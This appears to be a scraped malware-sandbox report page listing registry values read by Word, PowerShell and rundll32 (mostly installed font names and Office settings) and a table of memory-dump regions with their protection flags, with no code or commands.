|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@MS Mincho
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@MS PGothic
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@MS PMincho
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@MS UI Gothic
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@NSimSun
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@PMingLiU
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@PMingLiU-ExtB
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@SimHei
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@SimSun
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@SimSun-ExtB
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Agency FB
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Aharoni
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Algerian
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Andalus
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Angsana New
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
AngsanaUPC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Aparajita
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Arabic Typesetting
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Arial
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Arial Black
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Arial Narrow
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Arial Rounded MT Bold
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Arial Unicode MS
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Baskerville Old Face
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Batang
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
BatangChe
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Bauhaus 93
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Bell MT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Berlin Sans FB
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Berlin Sans FB Demi
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Bernard MT Condensed
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Blackadder ITC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Bodoni MT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Bodoni MT Black
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Bodoni MT Condensed
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Bodoni MT Poster Compressed
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Book Antiqua
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Bookman Old Style
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Bookshelf Symbol 7
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Bradley Hand ITC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Britannic Bold
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Broadway
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Browallia New
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
BrowalliaUPC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Brush Script MT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Calibri
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Calibri Light
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Californian FB
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Calisto MT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Cambria
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Cambria Math
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Candara
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Castellar
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Centaur
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Century
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Century Gothic
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Century Schoolbook
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Chiller
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Colonna MT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Comic Sans MS
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Consolas
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Constantia
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Cooper Black
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Copperplate Gothic Bold
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Copperplate Gothic Light
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Corbel
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Cordia New
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
CordiaUPC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Courier New
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Curlz MT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
DaunPenh
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
David
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
DFKai-SB
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
DilleniaUPC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
DokChampa
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Dotum
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
DotumChe
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Ebrima
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Edwardian Script ITC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Elephant
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Engravers MT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Eras Bold ITC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Eras Demi ITC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Eras Light ITC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Eras Medium ITC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Estrangelo Edessa
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
EucrosiaUPC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Euphemia
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
FangSong
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Felix Titling
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Footlight MT Light
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Forte
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Franklin Gothic Book
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Franklin Gothic Demi
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Franklin Gothic Demi Cond
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Franklin Gothic Heavy
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Franklin Gothic Medium
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Franklin Gothic Medium Cond
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
FrankRuehl
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
FreesiaUPC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Freestyle Script
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
French Script MT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Gabriola
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Garamond
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Gautami
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Georgia
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Gigi
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Gill Sans MT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Gill Sans MT Condensed
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Gill Sans MT Ext Condensed Bold
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Gill Sans Ultra Bold
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Gill Sans Ultra Bold Condensed
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Gisha
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Gloucester MT Extra Condensed
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Goudy Old Style
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Goudy Stout
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Gulim
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
GulimChe
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Gungsuh
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
GungsuhChe
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Haettenschweiler
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Harlow Solid Italic
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Harrington
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
High Tower Text
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Impact
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Imprint MT Shadow
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Informal Roman
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
IrisUPC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Iskoola Pota
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
JasmineUPC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Jokerman
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Juice ITC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
KaiTi
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Kalinga
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Kartika
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Khmer UI
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
KodchiangUPC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Kokila
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Kristen ITC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Kunstler Script
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Lao UI
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Latha
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Leelawadee
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Levenim MT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
LilyUPC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Lucida Bright
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Lucida Calligraphy
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Lucida Console
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Lucida Fax
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Lucida Handwriting
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Lucida Sans
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Lucida Sans Typewriter
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Lucida Sans Unicode
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Magneto
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Maiandra GD
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Malgun Gothic
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Mangal
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Marlett
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Matura MT Script Capitals
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Meiryo
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Meiryo UI
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Microsoft Himalaya
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Microsoft JhengHei
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Microsoft New Tai Lue
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Microsoft PhagsPa
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Microsoft Sans Serif
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Microsoft Tai Le
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Microsoft Uighur
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Microsoft YaHei
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Microsoft Yi Baiti
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MingLiU
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MingLiU_HKSCS
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MingLiU_HKSCS-ExtB
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MingLiU-ExtB
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Miriam
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Miriam Fixed
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Mistral
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Modern No. 20
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Mongolian Baiti
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Monotype Corsiva
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MoolBoran
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MS Gothic
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MS Mincho
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MS Outlook
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MS PGothic
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MS PMincho
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MS Reference Sans Serif
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MS Reference Specialty
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MS UI Gothic
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MT Extra
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MV Boli
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Narkisim
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Niagara Engraved
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Niagara Solid
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
NSimSun
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Nyala
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
OCR A Extended
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Old English Text MT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Onyx
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Palace Script MT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Palatino Linotype
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Papyrus
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Parchment
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Perpetua
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Perpetua Titling MT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Plantagenet Cherokee
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Playbill
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
PMingLiU
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
PMingLiU-ExtB
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Poor Richard
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Pristina
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Raavi
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Rage Italic
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Ravie
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Rockwell
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Rockwell Condensed
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Rockwell Extra Bold
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Rod
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Sakkal Majalla
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Script MT Bold
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Segoe Print
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Segoe Script
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Segoe UI
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Segoe UI Light
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Segoe UI Semibold
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Segoe UI Symbol
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Shonar Bangla
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Showcard Gothic
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Shruti
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SimHei
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Simplified Arabic
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Simplified Arabic Fixed
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SimSun
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SimSun-ExtB
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Snap ITC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Stencil
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Sylfaen
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Symbol
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Tahoma
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Tempus Sans ITC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Times New Roman
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Traditional Arabic
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Trebuchet MS
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Tunga
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Tw Cen MT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Tw Cen MT Condensed
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Tw Cen MT Condensed Extra Bold
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Utsaah
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Vani
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Verdana
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Vijaya
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Viner Hand ITC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Vivaldi
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Vladimir Script
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Vrinda
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Webdings
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Wide Latin
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Wingdings
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Wingdings 2
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Wingdings 3
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Cambria Math
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Tahoma
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
F57B1
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
LastPurgeTime
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
1033
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
1033
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
WORDFiles
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
ProductFiles
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
ProductFiles
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_3082
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_3082
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_1036
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_1036
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_1033
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_1033
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_3082
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_3082
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_1036
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_1036
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_1033
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_1033
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_1033
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_1033
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_1033
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_1033
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
ProductFiles
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
ProductFiles
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
F57B1
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Settings
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
ZoomApp
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
ProductFiles
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
ProductFiles
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MTTF
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MTTA
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
EnableFileTracing
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
EnableConsoleTracing
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
FileTracingMask
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
ConsoleTracingMask
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
MaxFileSize
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
FileDirectory
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
EnableFileTracing
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
EnableConsoleTracing
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
FileTracingMask
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
ConsoleTracingMask
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
MaxFileSize
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
FileDirectory
|
||
C:\Windows\SysWOW64\rundll32.exe
|
SavedLegacySettings
|
There are 326 hidden registries, click here to show them.
Memdumps
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
---|---|---|---|---|
10000000
|
unkown
|
page execute and read and write
|
||
10000000
|
unkown
|
page execute and read and write
|
||
1C0000
|
unkown
|
page execute and read and write
|
||
1A0000
|
unkown
|
page execute and read and write
|
||
10000000
|
unkown
|
page execute and read and write
|
||
200000
|
unkown
|
page execute and read and write
|
||
10000000
|
unkown
|
page execute and read and write
|
||
10000000
|
unkown
|
page execute and read and write
|
||
150000
|
unkown
|
page execute and read and write
|
||
360000
|
unkown
|
page execute and read and write
|
||
1F0000
|
unkown
|
page execute and read and write
|
||
170000
|
unkown
|
page execute and read and write
|
||
10000000
|
unkown
|
page execute and read and write
|
||
170000
|
unkown
|
page execute and read and write
|
||
10000000
|
unkown
|
page execute and read and write
|
||
380000
|
unkown
|
page execute and read and write
|
||
190000
|
unkown
|
page execute and read and write
|
||
10000000
|
unkown
|
page execute and read and write
|
||
1F0000
|
unkown
|
page execute and read and write
|
||
10000000
|
unkown
|
page execute and read and write
|
||
10000000
|
unkown
|
page execute and read and write
|
||
240000
|
unkown
|
page execute and read and write
|
||
1E0000
|
unkown
|
page execute and read and write
|
||
10000000
|
unkown
|
page execute and read and write
|
||
190000
|
unkown
|
page execute and read and write
|
||
1D0000
|
unkown
|
page execute and read and write
|
||
1B0000
|
unkown
|
page execute and read and write
|
||
1B0000
|
unkown
|
page execute and read and write
|
||
1E0000
|
unkown
|
page execute and read and write
|
||
10000000
|
unkown
|
page execute and read and write
|
||
1F0000
|
unkown
|
page execute and read and write
|
||
210000
|
unkown
|
page execute and read and write
|
||
200000
|
unkown
|
page execute and read and write
|
||
1D0000
|
unkown
|
page execute and read and write
|
||
1D0000
|
unkown
|
page execute and read and write
|
||
1D0000
|
unkown
|
page execute and read and write
|
||
232E000
|
stack
|
page read and write
|
||
8FD000
|
heap default
|
page read and write
|
||
67D000
|
stack
|
page read and write
|
||
2A0000
|
unkown
|
page readonly
|
||
7FF00052000
|
unkown
|
page execute and read and write
|
||
2150000
|
unkown
|
page readonly
|
||
1B4C5000
|
unkown
|
page read and write
|
||
10022000
|
unkown
|
page execute and read and write
|
||
20000
|
unkown
|
page readonly
|
||
1BB20000
|
unkown
|
page read and write
|
||
10022000
|
unkown
|
page execute and read and write
|
||
1FB0000
|
unkown
|
page read and write
|
||
2A7000
|
heap default
|
page read and write
|
||
25A0000
|
unkown
|
page read and write
|
||
202F000
|
unkown
|
page read and write
|
||
1DE0000
|
unkown
|
page readonly
|
||
3B7000
|
heap private
|
page read and write
|
||
1FB0000
|
unkown
|
page read and write
|
